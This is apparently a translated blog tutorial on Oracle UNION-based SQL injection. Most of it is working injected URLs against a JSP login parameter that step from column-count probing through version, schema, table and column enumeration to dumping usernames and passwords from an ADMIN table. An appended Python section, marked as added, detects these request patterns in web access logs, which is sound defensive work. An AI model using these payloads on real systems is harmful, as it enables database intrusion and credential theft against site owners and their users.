Oracle union injection summary

Conventional Oracle union injection


Oracle Database, also known as Oracle RDBMS or simply Oracle, is a relational database management system from Oracle Corporation.

Compared with MySQL and MSSQL, Oracle usually means larger data volumes and greater privileges.

Some small points to watch in Oracle injection:

1. Oracle handles UNION queries differently from MySQL. In MySQL you can use 1,2,3,4 as placeholders, but Oracle enforces strict type matching: each column of your UNION SELECT must have the same type as the corresponding column of the preceding query. NULL can be used as a placeholder, since it is compatible with any column type.
2. Unlike MySQL, Oracle has no LIMIT for pagination; paging is done with three nested queries instead (the query below fetches the first row, i.e. RN >= 0 and ROWNUM <= 1), for example:

SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >= 0

3. Oracle's single-line comment marker is --, and the multi-line comment marker is /**/.


As usual, submit ORDER BY to guess how many columns the SQL query behind the current page selects, i.e. to confirm the column count.

http://www.jsporcle.com/a.jsp?username=SMITH%27%20order%20by%208%20--

Then confirm the count with a UNION SELECT made up of NULL placeholders (in Oracle a SELECT needs a FROM clause, hence FROM dual):

http://www.jsporcle.com/a.jsp?username=SMITH%27%20union%20select%20null,null,null,null,null,null,null,null%20from%20dual%20--

Dump the database version:

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual  --

Other information-gathering queries:

1 Current user roles (select * from session_roles)
2 Current database version (select banner from sys.v_$version where rownum=1)
3 Server egress IP (can be obtained with utl_http.request)
4 Server listening IP (select utl_inaddr.get_host_address from dual)
5 Server operating system (select member from v$logfile where rownum=1)
6 Server SID (select instance_name from v$instance)
7 Currently connected user (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
8 Current user (SELECT user FROM dual)

Dump the schema (database) names; the second query excludes SYS to reach the next owner:

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual  --
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select owner from all_tables where rownum=1 and owner <>'SYS' ),null,null,null,null,null from dual --

Dump tables:
Table names must be written in uppercase (Oracle stores unquoted identifiers in uppercase in its data dictionary).
Query the first table:

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual --

Dump columns

Query the first column of table ADMIN:

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1),null,null,null,null,null,null from dual --

The second column (exclude the one already found):

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),null,null,null,null,null,null from dual --

Query the third column of table ADMIN:

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and column_name<>'USERNAME' and rownum=1),null,null,null,null,null,null from dual --

The columns found are ID, USERNAME and PASSWORD.

Dump data:

http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual --
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT USERNAME FROM ADMIN),(SELECT PASSWORD FROM ADMIN),null,null,null,null,null from dual --

Some commonly used queries:

Current user:
SELECT user FROM dual;
List all users:
SELECT username FROM all_users ORDER BY username;
List databases (schemas):
SELECT DISTINCT owner FROM all_tables;
List table names:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
Query all columns of a table:
SELECT column_name FROM all_tab_columns WHERE TABLE_NAME='ADMIN';
Locate data files:
SELECT name FROM V$DATAFILE;
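For the defensive side, here is an added example (not from the original post) that scans web-server access-log lines for the Oracle-specific union-injection shapes described above: the NULL placeholders forced by Oracle's strict column typing, the mandatory FROM dual, the ROWNUM single-row trick, the dictionary views being enumerated and the utl_http/utl_inaddr packages. The log lines, the signature names and the log format are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post), modelled on the
# request shapes above; the first two are benign, the rest come from one probing IP.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2019:10:00:01 +0800] "GET /a.jsp?username=SMITH HTTP/1.1" 200 512
10.0.0.5 - - [12/May/2019:10:00:02 +0800] "GET /a.jsp?username=O%27Brien HTTP/1.1" 200 498
10.0.0.9 - - [12/May/2019:10:00:03 +0800] "GET /a.jsp?username=SMITH%27%20order%20by%208%20-- HTTP/1.1" 500 120
10.0.0.9 - - [12/May/2019:10:00:04 +0800] "GET /a.jsp?username=SMITH%27%20union%20select%20null,null,null,null,null,null,null,null%20from%20dual%20-- HTTP/1.1" 200 612
10.0.0.9 - - [12/May/2019:10:00:05 +0800] "GET /a.jsp?username=SMITH%27%20union%20select%20null,null,(select%20banner%20from%20sys.v_$version%20where%20rownum=1),null,null,null,null,null%20from%20dual%20-- HTTP/1.1" 200 640
"""

# Combined-log-format request line: client IP, timestamp, method, path, status code.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Oracle-flavoured signatures taken from the post; each is matched against the URL-decoded path.
SIGNATURES = {
    # ORDER BY n -- : the column-count probe
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+\s*--", re.I),
    # UNION SELECT null,... FROM dual : NULL placeholders satisfy Oracle's strict typing
    "union_null_from_dual": re.compile(r"union\s+select\s+(?:null\s*,\s*)*null[^;]*from\s+dual", re.I),
    # data-dictionary and V$ views used to enumerate version, schemas, tables and columns
    "oracle_dictionary_view": re.compile(
        r"\b(?:sys\.v_\$version|v\$(?:instance|logfile|datafile)|all_tables|user_tables"
        r"|user_tab_columns|all_tab_columns|all_users|session_roles)\b", re.I),
    # ROWNUM=1 / ROWNUM<=n : Oracle's substitute for LIMIT, one row per request
    "rownum_single_row": re.compile(r"\brownum\s*(?:=|<=)\s*\d+", re.I),
    # utl_http / utl_inaddr : packages that reach the network from inside the database
    "oracle_network_package": re.compile(r"\butl_(?:http|inaddr)\.", re.I),
}

def classify_request(path):
    """Return the sorted names of all signatures matching one URL-decoded request path."""
    decoded = unquote_plus(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(text):
    """Return (client_ip, status, signatures) for every log line that hits a signature."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m is None:
            continue  # not a request line we understand; skip rather than guess
        sigs = classify_request(m.group("path"))
        if sigs:
            hits.append((m.group("ip"), int(m.group("status")), sigs))
    return hits
```

Running scan_log(SAMPLE_LOG) flags only the three requests from 10.0.0.9; the apostrophe in O'Brien alone is not enough to match, which keeps the ORDER BY probe signature from firing on ordinary names.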
Original article: https://www.cnblogs.com/-qing-/p/10948662.html